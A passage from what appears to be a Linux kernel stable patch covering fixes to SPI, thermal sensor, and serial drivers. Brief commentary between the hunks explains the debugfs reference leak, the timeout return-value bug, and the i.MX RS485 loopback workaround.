++	debugfs_lookup_and_remove(TRC_ENABLE_FILE, snic_glob->trc_root);
+ }
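
The snic change swaps the debugfs_remove(debugfs_lookup(...)) idiom for debugfs_lookup_and_remove(). The distinction matters because debugfs_lookup() returns the dentry with an extra reference that debugfs_remove() never drops, so the old spelling leaked a dentry per call; the combined helper performs the lookup, the removal, and the dput() internally. Side by side (file name illustrative):

	/* leaky: debugfs_lookup() takes a reference nobody ever drops */
	debugfs_remove(debugfs_lookup("tracing_enable", parent));

	/* safe: lookup, removal, and dput() in one call */
	debugfs_lookup_and_remove("tracing_enable", parent);
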
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 93929f19d0831..b65cdf2a7593e 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -127,7 +127,8 @@ MODULE_PARM_DESC(cdns_mcp_int_mask, "Cadence MCP IntMask");
+ 
+ #define CDNS_MCP_CMD_BASE			0x80
+ #define CDNS_MCP_RESP_BASE			0x80
+-#define CDNS_MCP_CMD_LEN			0x20
++/* FIFO can hold 8 commands */
++#define CDNS_MCP_CMD_LEN			8
+ #define CDNS_MCP_CMD_WORD_LEN			0x4
+ 
+ #define CDNS_MCP_CMD_SSP_TAG			BIT(31)
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index d1bb62f7368b7..d4b969e68c314 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -295,7 +295,6 @@ config SPI_DW_BT1
+ 	tristate "Baikal-T1 SPI driver for DW SPI core"
+ 	depends on MIPS_BAIKAL_T1 || COMPILE_TEST
+ 	select MULTIPLEXER
+-	select MUX_MMIO
+ 	help
+ 	  Baikal-T1 SoC is equipped with three DW APB SSI-based MMIO SPI
+ 	  controllers. Two of them are pretty much normal: with IRQ, DMA,
+diff --git a/drivers/spi/spi-bcm63xx-hsspi.c b/drivers/spi/spi-bcm63xx-hsspi.c
+index b871fd810d801..02f56fc001b47 100644
+--- a/drivers/spi/spi-bcm63xx-hsspi.c
++++ b/drivers/spi/spi-bcm63xx-hsspi.c
+@@ -163,6 +163,7 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 	int step_size = HSSPI_BUFFER_LEN;
+ 	const u8 *tx = t->tx_buf;
+ 	u8 *rx = t->rx_buf;
++	u32 val = 0;
+ 
+ 	bcm63xx_hsspi_set_clk(bs, spi, t->speed_hz);
+ 	bcm63xx_hsspi_set_cs(bs, spi->chip_select, true);
+@@ -178,11 +179,16 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 		step_size -= HSSPI_OPCODE_LEN;
+ 
+ 	if ((opcode == HSSPI_OP_READ && t->rx_nbits == SPI_NBITS_DUAL) ||
+-	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL))
++	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL)) {
+ 		opcode |= HSSPI_OP_MULTIBIT;
+ 
+-	__raw_writel(1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT |
+-		     1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT | 0xff,
++		if (t->rx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT;
++		if (t->tx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT;
++	}
++
++	__raw_writel(val | 0xff,
+ 		     bs->regs + HSSPI_PROFILE_MODE_CTRL_REG(chip_select));
+ 
+ 	while (pending > 0) {
+diff --git a/drivers/spi/spi-synquacer.c b/drivers/spi/spi-synquacer.c
+index 47cbe73137c23..dc188f9202c97 100644
+--- a/drivers/spi/spi-synquacer.c
++++ b/drivers/spi/spi-synquacer.c
+@@ -472,10 +472,9 @@ static int synquacer_spi_transfer_one(struct spi_master *master,
+ 		read_fifo(sspi);
+ 	}
+ 
+-	if (status < 0) {
+-		dev_err(sspi->dev, "failed to transfer. status: 0x%x\n",
+-			status);
+-		return status;
++	if (status == 0) {
++		dev_err(sspi->dev, "failed to transfer. Timeout.\n");
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	return 0;
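
The synquacer fix works because status here comes from wait_for_completion_timeout(), which returns 0 on timeout and the number of jiffies remaining otherwise; it is never negative, so the old status < 0 branch was dead code and timeouts fell through as success. The usual shape of a correct check:

	unsigned long left;

	left = wait_for_completion_timeout(&xfer_done, msecs_to_jiffies(1000));
	if (!left)
		return -ETIMEDOUT;	/* 0 == timed out; >0 == jiffies left */
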
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_fops.c b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+index 84a84e0cdeef7..5fa2e2596a818 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_fops.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+@@ -741,13 +741,13 @@ init_subdev:
+ 		goto done;
+ 
+ 	atomisp_subdev_init_struct(asd);
++	/* Ensure that a mode is set */
++	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ done:
+ 	pipe->users++;
+ 	mutex_unlock(&isp->mutex);
+ 
+-	/* Ensure that a mode is set */
+-	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/staging/media/imx/imx7-media-csi.c b/drivers/staging/media/imx/imx7-media-csi.c
+index c77401f184d74..5f6376c3269ab 100644
+--- a/drivers/staging/media/imx/imx7-media-csi.c
++++ b/drivers/staging/media/imx/imx7-media-csi.c
+@@ -638,8 +638,10 @@ static int imx7_csi_init(struct imx7_csi *csi)
+ 	imx7_csi_configure(csi);
+ 
+ 	ret = imx7_csi_dma_setup(csi);
+-	if (ret < 0)
++	if (ret < 0) {
++		clk_disable_unprepare(csi->mclk);
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/thermal/hisi_thermal.c b/drivers/thermal/hisi_thermal.c
+index d6974db7aaf76..15af90f5c7d91 100644
+--- a/drivers/thermal/hisi_thermal.c
++++ b/drivers/thermal/hisi_thermal.c
+@@ -427,10 +427,6 @@ static int hi3660_thermal_probe(struct hisi_thermal_data *data)
+ 	data->sensor[0].irq_name = "tsensor_a73";
+ 	data->sensor[0].data = data;
+ 
+-	data->sensor[1].id = HI3660_LITTLE_SENSOR;
+-	data->sensor[1].irq_name = "tsensor_a53";
+-	data->sensor[1].data = data;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/thermal/imx_sc_thermal.c b/drivers/thermal/imx_sc_thermal.c
+index 5d92b70a5d53a..dfadb03580ae1 100644
+--- a/drivers/thermal/imx_sc_thermal.c
++++ b/drivers/thermal/imx_sc_thermal.c
+@@ -88,7 +88,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	if (!resource_id)
+ 		return -EINVAL;
+ 
+-	for (i = 0; resource_id[i] > 0; i++) {
++	for (i = 0; resource_id[i] >= 0; i++) {
+ 
+ 		sensor = devm_kzalloc(&pdev->dev, sizeof(*sensor), GFP_KERNEL);
+ 		if (!sensor)
+@@ -127,12 +127,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int imx_sc_thermal_remove(struct platform_device *pdev)
+-{
+-	return 0;
+-}
+-
+-static int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
++static const int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
+ 
+ static const struct of_device_id imx_sc_thermal_table[] = {
+ 	{ .compatible = "fsl,imx-sc-thermal", .data =  imx_sc_sensors },
+@@ -142,7 +137,6 @@ MODULE_DEVICE_TABLE(of, imx_sc_thermal_table);
+ 
+ static struct platform_driver imx_sc_thermal_driver = {
+ 		.probe = imx_sc_thermal_probe,
+-		.remove	= imx_sc_thermal_remove,
+ 		.driver = {
+ 			.name = "imx-sc-thermal",
+ 			.of_match_table = imx_sc_thermal_table,
+diff --git a/drivers/thermal/intel/intel_pch_thermal.c b/drivers/thermal/intel/intel_pch_thermal.c
+index dabf11a687a15..9e27f430e0345 100644
+--- a/drivers/thermal/intel/intel_pch_thermal.c
++++ b/drivers/thermal/intel/intel_pch_thermal.c
+@@ -29,6 +29,7 @@
+ #define PCH_THERMAL_DID_CNL_LP	0x02F9 /* CNL-LP PCH */
+ #define PCH_THERMAL_DID_CML_H	0X06F9 /* CML-H PCH */
+ #define PCH_THERMAL_DID_LWB	0xA1B1 /* Lewisburg PCH */
++#define PCH_THERMAL_DID_WBG	0x8D24 /* Wellsburg PCH */
+ 
+ /* Wildcat Point-LP  PCH Thermal registers */
+ #define WPT_TEMP	0x0000	/* Temperature */
+@@ -350,6 +351,7 @@ enum board_ids {
+ 	board_cnl,
+ 	board_cml,
+ 	board_lwb,
++	board_wbg,
+ };
+ 
+ static const struct board_info {
+@@ -380,6 +382,10 @@ static const struct board_info {
+ 		.name = "pch_lewisburg",
+ 		.ops = &pch_dev_ops_wpt,
+ 	},
++	[board_wbg] = {
++		.name = "pch_wellsburg",
++		.ops = &pch_dev_ops_wpt,
++	},
+ };
+ 
+ static int intel_pch_thermal_probe(struct pci_dev *pdev,
+@@ -495,6 +501,8 @@ static const struct pci_device_id intel_pch_thermal_id[] = {
+ 		.driver_data = board_cml, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_LWB),
+ 		.driver_data = board_lwb, },
++	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_WBG),
++		.driver_data = board_wbg, },
+ 	{ 0, },
+ };
+ MODULE_DEVICE_TABLE(pci, intel_pch_thermal_id);
+diff --git a/drivers/thermal/intel/intel_powerclamp.c b/drivers/thermal/intel/intel_powerclamp.c
+index b80e25ec12615..2f4cbfdf26a00 100644
+--- a/drivers/thermal/intel/intel_powerclamp.c
++++ b/drivers/thermal/intel/intel_powerclamp.c
+@@ -57,6 +57,7 @@
+ 
+ static unsigned int target_mwait;
+ static struct dentry *debug_dir;
++static bool poll_pkg_cstate_enable;
+ 
+ /* user selected target */
+ static unsigned int set_target_ratio;
+@@ -261,6 +262,9 @@ static unsigned int get_compensation(int ratio)
+ {
+ 	unsigned int comp = 0;
+ 
++	if (!poll_pkg_cstate_enable)
++		return 0;
++
+ 	/* we only use compensation if all adjacent ones are good */
+ 	if (ratio == 1 &&
+ 		cal_data[ratio].confidence >= CONFIDENCE_OK &&
+@@ -519,7 +523,8 @@ static int start_power_clamp(void)
+ 	control_cpu = cpumask_first(cpu_online_mask);
+ 
+ 	clamping = true;
+-	schedule_delayed_work(&poll_pkg_cstate_work, 0);
++	if (poll_pkg_cstate_enable)
++		schedule_delayed_work(&poll_pkg_cstate_work, 0);
+ 
+ 	/* start one kthread worker per online cpu */
+ 	for_each_online_cpu(cpu) {
+@@ -585,11 +590,15 @@ static int powerclamp_get_max_state(struct thermal_cooling_device *cdev,
+ static int powerclamp_get_cur_state(struct thermal_cooling_device *cdev,
+ 				 unsigned long *state)
+ {
+-	if (true == clamping)
+-		*state = pkg_cstate_ratio_cur;
+-	else
++	if (clamping) {
++		if (poll_pkg_cstate_enable)
++			*state = pkg_cstate_ratio_cur;
++		else
++			*state = set_target_ratio;
++	} else {
+ 		/* to save power, do not poll idle ratio while not clamping */
+ 		*state = -1; /* indicates invalid state */
++	}
+ 
+ 	return 0;
+ }
+@@ -712,6 +721,9 @@ static int __init powerclamp_init(void)
+ 		goto exit_unregister;
+ 	}
+ 
++	if (topology_max_packages() == 1 && topology_max_die_per_package() == 1)
++		poll_pkg_cstate_enable = true;
++
+ 	cooling_dev = thermal_cooling_device_register("intel_powerclamp", NULL,
+ 						&powerclamp_cooling_ops);
+ 	if (IS_ERR(cooling_dev)) {
+diff --git a/drivers/thermal/intel/intel_soc_dts_iosf.c b/drivers/thermal/intel/intel_soc_dts_iosf.c
+index 342b0bb5a56d9..8651ff1abe754 100644
+--- a/drivers/thermal/intel/intel_soc_dts_iosf.c
++++ b/drivers/thermal/intel/intel_soc_dts_iosf.c
+@@ -405,7 +405,7 @@ struct intel_soc_dts_sensors *intel_soc_dts_iosf_init(
+ {
+ 	struct intel_soc_dts_sensors *sensors;
+ 	bool notification;
+-	u32 tj_max;
++	int tj_max;
+ 	int ret;
+ 	int i;
+ 
+diff --git a/drivers/thermal/qcom/tsens-v0_1.c b/drivers/thermal/qcom/tsens-v0_1.c
+index 327f37202c69f..8d036727b99fe 100644
+--- a/drivers/thermal/qcom/tsens-v0_1.c
++++ b/drivers/thermal/qcom/tsens-v0_1.c
+@@ -285,7 +285,7 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	u32 p1[10], p2[10];
+ 	int mode = 0;
+ 	u32 *qfprom_cdata;
+-	u32 cdata[6];
++	u32 cdata[4];
+ 
+ 	qfprom_cdata = (u32 *)qfprom_read(priv->dev, "calib");
+ 	if (IS_ERR(qfprom_cdata))
+@@ -296,8 +296,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	cdata[1] = qfprom_cdata[13];
+ 	cdata[2] = qfprom_cdata[0];
+ 	cdata[3] = qfprom_cdata[1];
+-	cdata[4] = qfprom_cdata[22];
+-	cdata[5] = qfprom_cdata[21];
+ 
+ 	mode = (cdata[0] & MSM8939_CAL_SEL_MASK) >> MSM8939_CAL_SEL_SHIFT;
+ 	dev_dbg(priv->dev, "calibration mode is %d\n", mode);
+@@ -314,8 +312,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p2[6] = (cdata[2] & MSM8939_S6_P2_MASK) >> MSM8939_S6_P2_SHIFT;
+ 		p2[7] = (cdata[3] & MSM8939_S7_P2_MASK) >> MSM8939_S7_P2_SHIFT;
+ 		p2[8] = (cdata[3] & MSM8939_S8_P2_MASK) >> MSM8939_S8_P2_SHIFT;
+-		p2[9] = (cdata[4] & MSM8939_S9_P2_MASK_0_4) >> MSM8939_S9_P2_SHIFT_0_4;
+-		p2[9] |= ((cdata[5] & MSM8939_S9_P2_MASK_5) >> MSM8939_S9_P2_SHIFT_5) << 5;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p2[i] = (base1 + p2[i]) << 2;
+ 		fallthrough;
+@@ -331,7 +327,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p1[6] = (cdata[2] & MSM8939_S6_P1_MASK) >> MSM8939_S6_P1_SHIFT;
+ 		p1[7] = (cdata[3] & MSM8939_S7_P1_MASK) >> MSM8939_S7_P1_SHIFT;
+ 		p1[8] = (cdata[3] & MSM8939_S8_P1_MASK) >> MSM8939_S8_P1_SHIFT;
+-		p1[9] = (cdata[4] & MSM8939_S9_P1_MASK) >> MSM8939_S9_P1_SHIFT;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p1[i] = ((base0) + p1[i]) << 2;
+ 		break;
+@@ -534,6 +529,21 @@ static int calibrate_9607(struct tsens_priv *priv)
+ 	return 0;
+ }
+ 
++static int __init init_8939(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 2911;
++	priv->sensor[1].slope = 2789;
++	priv->sensor[2].slope = 2906;
++	priv->sensor[3].slope = 2763;
++	priv->sensor[4].slope = 2922;
++	priv->sensor[5].slope = 2867;
++	priv->sensor[6].slope = 2833;
++	priv->sensor[7].slope = 2838;
++	priv->sensor[8].slope = 2840;
++	/* priv->sensor[9].slope = 2852; */
++
++	return init_common(priv);
++}
++
+ /* v0.1: 8916, 8939, 8974, 9607 */
+ 
+ static struct tsens_features tsens_v0_1_feat = {
+@@ -596,15 +606,15 @@ struct tsens_plat_data data_8916 = {
+ };
+ 
+ static const struct tsens_ops ops_8939 = {
+-	.init		= init_common,
++	.init		= init_8939,
+ 	.calibrate	= calibrate_8939,
+ 	.get_temp	= get_temp_common,
+ };
+ 
+ struct tsens_plat_data data_8939 = {
+-	.num_sensors	= 10,
++	.num_sensors	= 9,
+ 	.ops		= &ops_8939,
+-	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, 10 },
++	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, /* 10 */ },
+ 
+ 	.feat		= &tsens_v0_1_feat,
+ 	.fields	= tsens_v0_1_regfields,
+diff --git a/drivers/thermal/qcom/tsens-v1.c b/drivers/thermal/qcom/tsens-v1.c
+index 573e261ccca74..faa4576fa028f 100644
+--- a/drivers/thermal/qcom/tsens-v1.c
++++ b/drivers/thermal/qcom/tsens-v1.c
+@@ -78,11 +78,6 @@
+ 
+ #define MSM8976_CAL_SEL_MASK	0x3
+ 
+-#define MSM8976_CAL_DEGC_PT1	30
+-#define MSM8976_CAL_DEGC_PT2	120
+-#define MSM8976_SLOPE_FACTOR	1000
+-#define MSM8976_SLOPE_DEFAULT	3200
+-
+ /* eeprom layout data for qcs404/405 (v1) */
+ #define BASE0_MASK	0x000007f8
+ #define BASE1_MASK	0x0007f800
+@@ -142,30 +137,6 @@
+ #define CAL_SEL_MASK	7
+ #define CAL_SEL_SHIFT	0
+ 
+-static void compute_intercept_slope_8976(struct tsens_priv *priv,
+-			      u32 *p1, u32 *p2, u32 mode)
+-{
+-	int i;
+-
+-	priv->sensor[0].slope = 3313;
+-	priv->sensor[1].slope = 3275;
+-	priv->sensor[2].slope = 3320;
+-	priv->sensor[3].slope = 3246;
+-	priv->sensor[4].slope = 3279;
+-	priv->sensor[5].slope = 3257;
+-	priv->sensor[6].slope = 3234;
+-	priv->sensor[7].slope = 3269;
+-	priv->sensor[8].slope = 3255;
+-	priv->sensor[9].slope = 3239;
+-	priv->sensor[10].slope = 3286;
+-
+-	for (i = 0; i < priv->num_sensors; i++) {
+-		priv->sensor[i].offset = (p1[i] * MSM8976_SLOPE_FACTOR) -
+-				(MSM8976_CAL_DEGC_PT1 *
+-				priv->sensor[i].slope);
+-	}
+-}
+-
+ static int calibrate_v1(struct tsens_priv *priv)
+ {
+ 	u32 base0 = 0, base1 = 0;
+@@ -291,7 +262,7 @@ static int calibrate_8976(struct tsens_priv *priv)
+ 		break;
+ 	}
+ 
+-	compute_intercept_slope_8976(priv, p1, p2, mode);
++	compute_intercept_slope(priv, p1, p2, mode);
+ 	kfree(qfprom_cdata);
+ 
+ 	return 0;
+@@ -362,6 +333,22 @@ static const struct reg_field tsens_v1_regfields[MAX_REGFIELDS] = {
+ 	[TRDY] = REG_FIELD(TM_TRDY_OFF, 0, 0),
+ };
+ 
++static int __init init_8956(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 3313;
++	priv->sensor[1].slope = 3275;
++	priv->sensor[2].slope = 3320;
++	priv->sensor[3].slope = 3246;
++	priv->sensor[4].slope = 3279;
++	priv->sensor[5].slope = 3257;
++	priv->sensor[6].slope = 3234;
++	priv->sensor[7].slope = 3269;
++	priv->sensor[8].slope = 3255;
++	priv->sensor[9].slope = 3239;
++	priv->sensor[10].slope = 3286;
++
++	return init_common(priv);
++}
++
+ static const struct tsens_ops ops_generic_v1 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_v1,
+@@ -374,13 +361,25 @@ struct tsens_plat_data data_tsens_v1 = {
+ 	.fields	= tsens_v1_regfields,
+ };
+ 
++static const struct tsens_ops ops_8956 = {
++	.init		= init_8956,
++	.calibrate	= calibrate_8976,
++	.get_temp	= get_temp_tsens_valid,
++};
++
++struct tsens_plat_data data_8956 = {
++	.num_sensors	= 11,
++	.ops		= &ops_8956,
++	.feat		= &tsens_v1_feat,
++	.fields		= tsens_v1_regfields,
++};
++
+ static const struct tsens_ops ops_8976 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_8976,
+ 	.get_temp	= get_temp_tsens_valid,
+ };
+ 
+-/* Valid for both MSM8956 and MSM8976. */
+ struct tsens_plat_data data_8976 = {
+ 	.num_sensors	= 11,
+ 	.ops		= &ops_8976,
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index b1b10005fb286..252c5ffdd1b66 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -968,6 +968,9 @@ static const struct of_device_id tsens_table[] = {
+ 	}, {
+ 		.compatible = "qcom,msm8939-tsens",
+ 		.data = &data_8939,
++	}, {
++		.compatible = "qcom,msm8956-tsens",
++		.data = &data_8956,
+ 	}, {
+ 		.compatible = "qcom,msm8960-tsens",
+ 		.data = &data_8960,
+diff --git a/drivers/thermal/qcom/tsens.h b/drivers/thermal/qcom/tsens.h
+index ba05c82333565..4f969dd7dc47a 100644
+--- a/drivers/thermal/qcom/tsens.h
++++ b/drivers/thermal/qcom/tsens.h
+@@ -588,7 +588,7 @@ extern struct tsens_plat_data data_8960;
+ extern struct tsens_plat_data data_8916, data_8939, data_8974, data_9607;
+ 
+ /* TSENS v1 targets */
+-extern struct tsens_plat_data data_tsens_v1, data_8976;
++extern struct tsens_plat_data data_tsens_v1, data_8976, data_8956;
+ 
+ /* TSENS v2 targets */
+ extern struct tsens_plat_data data_8996, data_tsens_v2;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 888e01fbd9c5f..13a6cd0116a13 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1393,9 +1393,9 @@ static int lpuart32_config_rs485(struct uart_port *port, struct ktermios *termio
+ 		 * Note: UART is assumed to be active high.
+ 		 */
+ 		if (rs485->flags & SER_RS485_RTS_ON_SEND)
+-			modem &= ~UARTMODEM_TXRTSPOL;
+-		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			modem |= UARTMODEM_TXRTSPOL;
++		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
++			modem &= ~UARTMODEM_TXRTSPOL;
+ 	}
+ 
+ 	lpuart32_write(&sport->port, modem, UARTMODIR);
+@@ -1684,12 +1684,6 @@ static void lpuart32_configure(struct lpuart_port *sport)
+ {
+ 	unsigned long temp;
+ 
+-	if (sport->lpuart_dma_rx_use) {
+-		/* RXWATER must be 0 */
+-		temp = lpuart32_read(&sport->port, UARTWATER);
+-		temp &= ~(UARTWATER_WATER_MASK << UARTWATER_RXWATER_OFF);
+-		lpuart32_write(&sport->port, temp, UARTWATER);
+-	}
+ 	temp = lpuart32_read(&sport->port, UARTCTRL);
+ 	if (!sport->lpuart_dma_rx_use)
+ 		temp |= UARTCTRL_RIE;
+@@ -1791,6 +1785,15 @@ static void lpuart32_shutdown(struct uart_port *port)
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+ 
++	/* clear status */
++	temp = lpuart32_read(&sport->port, UARTSTAT);
++	lpuart32_write(&sport->port, temp, UARTSTAT);
++
++	/* disable Rx/Tx DMA */
++	temp = lpuart32_read(port, UARTBAUD);
++	temp &= ~(UARTBAUD_TDMAE | UARTBAUD_RDMAE);
++	lpuart32_write(port, temp, UARTBAUD);
++
+ 	/* disable Rx/Tx and interrupts */
+ 	temp = lpuart32_read(port, UARTCTRL);
+ 	temp &= ~(UARTCTRL_TE | UARTCTRL_RE |
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index aadda66405b47..f07c4f9ff13c0 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -489,7 +489,7 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ static void imx_uart_stop_rx(struct uart_port *port)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+-	u32 ucr1, ucr2, ucr4;
++	u32 ucr1, ucr2, ucr4, uts;
+ 
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+ 	ucr2 = imx_uart_readl(sport, UCR2);
+@@ -505,7 +505,18 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 	imx_uart_writel(sport, ucr4, UCR4);
+ 
+-	ucr2 &= ~UCR2_RXEN;
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	if (port->rs485.flags & SER_RS485_ENABLED &&
++	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++		ucr2 |= UCR2_RXEN;
++	} else {
++		ucr2 &= ~UCR2_RXEN;
++	}
++
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ }
+ 
+@@ -1393,7 +1404,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 	int retval, i;
+ 	unsigned long flags;
+ 	int dma_is_inited = 0;
+-	u32 ucr1, ucr2, ucr3, ucr4;
++	u32 ucr1, ucr2, ucr3, ucr4, uts;
+ 
+ 	retval = clk_prepare_enable(sport->clk_per);
+ 	if (retval)
+@@ -1498,6 +1509,11 @@ static int imx_uart_startup(struct uart_port *port)
+ 		imx_uart_writel(sport, ucr2, UCR2);
+ 	}
+ 
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++	uts &= ~UTS_LOOP;
++	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++
+ 	spin_unlock_irqrestore(&sport->port.lock, flags);
+ 
+ 	return 0;
+@@ -1507,7 +1523,7 @@ static void imx_uart_shutdown(struct uart_port *port)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+ 	unsigned long flags;
+-	u32 ucr1, ucr2, ucr4;
++	u32 ucr1, ucr2, ucr4, uts;
+ 
+ 	if (sport->dma_is_enabled) {
+ 		dmaengine_terminate_sync(sport->dma_chan_tx);
+@@ -1551,7 +1567,18 @@ static void imx_uart_shutdown(struct uart_port *port)
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+-	ucr1 &= ~(UCR1_TRDYEN | UCR1_RRDYEN | UCR1_RTSDEN | UCR1_UARTEN | UCR1_RXDMAEN | UCR1_ATDMAEN);
++	ucr1 &= ~(UCR1_TRDYEN | UCR1_RRDYEN | UCR1_RTSDEN | UCR1_RXDMAEN | UCR1_ATDMAEN);
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	if (port->rs485.flags & SER_RS485_ENABLED &&
++	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++		ucr1 |= UCR1_UARTEN;
++	} else {
++		ucr1 &= ~UCR1_UARTEN;
++	}
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
+ 	ucr4 = imx_uart_readl(sport, UCR4);
+@@ -2213,7 +2240,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	u32 dma_buf_conf[2];
+ 	int ret = 0;
+-	u32 ucr1;
++	u32 ucr1, ucr2, uts;
+ 	struct resource *res;
+ 	int txirq, rxirq, rtsirq;
+ 
+@@ -2350,6 +2377,36 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	ucr1 &= ~(UCR1_ADEN | UCR1_TRDYEN | UCR1_IDEN | UCR1_RRDYEN | UCR1_RTSDEN);
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
++	/* Disable Ageing Timer interrupt */
++	ucr2 = imx_uart_readl(sport, UCR2);
++	ucr2 &= ~UCR2_ATEN;
++	imx_uart_writel(sport, ucr2, UCR2);
++
++	/*
++	 * In case RS485 is enabled without GPIO RTS control, the UART IP
++	 * is used to control CTS signal. Keep both the UART and Receiver
++	 * enabled, otherwise the UART IP pulls CTS signal always HIGH no
++	 * matter how the UCR2 CTSC and CTS bits are set. To prevent any
++	 * data from being fed into the RX FIFO, enable loopback mode in
++	 * UTS register, which disconnects the RX path from external RXD
++	 * pin and connects it to the Transceiver, which is disabled, so
++	 * no data can be fed to the RX FIFO that way.
++	 */
++	if (sport->port.rs485.flags & SER_RS485_ENABLED &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++
++		ucr1 = imx_uart_readl(sport, UCR1);
++		ucr1 |= UCR1_UARTEN;
++		imx_uart_writel(sport, ucr1, UCR1);
++
++		ucr2 = imx_uart_readl(sport, UCR2);
++		ucr2 |= UCR2_RXEN;
++		imx_uart_writel(sport, ucr2, UCR2);
++	}
++
+ 	if (!imx_uart_is_imx1(sport) && sport->dte_mode) {
+ 		/*
+ 		 * The DCEDTE bit changes the direction of DSR, DCD, DTR and RI
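
The i.MX hunks keep repeating one gesture that the long in-patch comment explains: when RS485 is driven by the UART IP itself (RTS/CTS wired, no RTS GPIO), the UART and receiver must stay enabled, so the RX path is instead detached from the pad by setting loopback mode in the UTS register. Each site is a plain read-modify-write of one bit; a kernel-context sketch of that helper shape (UTS_LOOP is bit 12 on i.MX, but treat the layout as illustrative here):

	#include <linux/io.h>
	#include <linux/types.h>

	#define UTS_LOOP	(1 << 12)	/* illustrative bit position */

	static void set_loopback(void __iomem *uts_reg, bool on)
	{
		u32 uts = readl(uts_reg);

		if (on)
			uts |= UTS_LOOP;	/* RX fed from the (idle) TX */
		else
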